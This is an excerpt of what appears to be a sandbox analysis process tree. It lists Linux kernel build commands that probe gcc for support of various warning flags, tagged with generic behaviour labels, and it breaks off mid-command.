/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wstringop-overflow_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-stringop-overflow\";_else_echo_\"\";_fi := -Wno-stringop-overflow' >> /tmp/a/.cache.mk"3⤵PID:2018
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-restrict\"; else echo \"\"; fi"3⤵PID:2019
-
/bin/mkdirmkdir -p /tmp/a/.tmp_20194⤵PID:2020
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o /tmp/a/.tmp_2019/tmp4⤵PID:2021
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2019/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wrestrict "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2022
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2019/tmp5⤵PID:2023
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2019/tmp5⤵PID:2023
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2019/tmp5⤵PID:2023
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2019/tmp5⤵PID:2023
-
/bin/rmrm -rf /tmp/a/.tmp_20194⤵PID:2024
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wrestrict_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-restrict\";_else_echo_\"\";_fi := -Wno-restrict' >> /tmp/a/.cache.mk"3⤵PID:2025
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wmaybe-uninitialized -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-maybe-uninitialized\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2026 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20264⤵PID:2027
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wmaybe-uninitialized -c -x c /dev/null -o /tmp/a/.tmp_2026/tmp4⤵PID:2028
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2026/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wmaybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2029
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2026/tmp5⤵PID:2030
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2026/tmp5⤵PID:2030
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2026/tmp5⤵PID:2030
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2026/tmp5⤵PID:2030
-
/bin/rmrm -rf /tmp/a/.tmp_20264⤵PID:2031
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wmaybe-uninitialized_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-maybe-uninitialized\";_else_echo_\"\";_fi := -Wno-maybe-uninitialized' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2032 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-strict-overflow\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2033 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20334⤵PID:2034
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -c -x c /dev/null -o /tmp/a/.tmp_2033/tmp4⤵PID:2035
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2033/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2036
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2033/tmp5⤵PID:2037
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2033/tmp5⤵PID:2037
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2033/tmp5⤵PID:2037
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2033/tmp5⤵PID:2037
-
/bin/rmrm -rf /tmp/a/.tmp_20334⤵PID:2038
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-strict-overflow\";_else_echo_\"\";_fi := -fno-strict-overflow' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:2039 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern 